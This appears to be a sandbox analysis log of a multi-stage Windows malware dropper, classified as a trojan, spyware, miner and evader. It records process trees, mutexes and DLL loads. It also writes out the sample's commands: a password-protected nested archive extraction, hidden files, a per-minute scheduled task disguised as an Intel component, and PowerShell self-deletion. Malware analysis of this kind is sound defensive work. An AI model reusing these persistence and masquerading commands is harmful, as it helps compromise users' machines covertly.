Source: random[1].exe2.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: random[1].exe2.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: b2885fa695.exe.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: b2885fa695.exe.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: random[2].exe1.5.dr, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: random[2].exe1.5.dr, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 322c3dce5b.exe.5.dr, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 322c3dce5b.exe.5.dr, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@84/60@12/13
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 6_2_00409606
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00C8AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C91D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 10_2_00C91D04
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040122A GetDiskFreeSpaceExW,SendMessageW, 6_2_0040122A
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow, 6_2_004092C1
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 6_2_004020BF
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Mutant created: \Sessions\1\BaseNamedObjects\48cb35e3030a2b429c6ac414faba9b49
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Mutant created: \Sessions\1\BaseNamedObjects\FloppyShip
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: b2885fa695.exe, 00000020.00000003.2583292514.0000000005665000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 55%
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe"
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe"
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe"
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe"
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: netutils.dll Jump to behavior
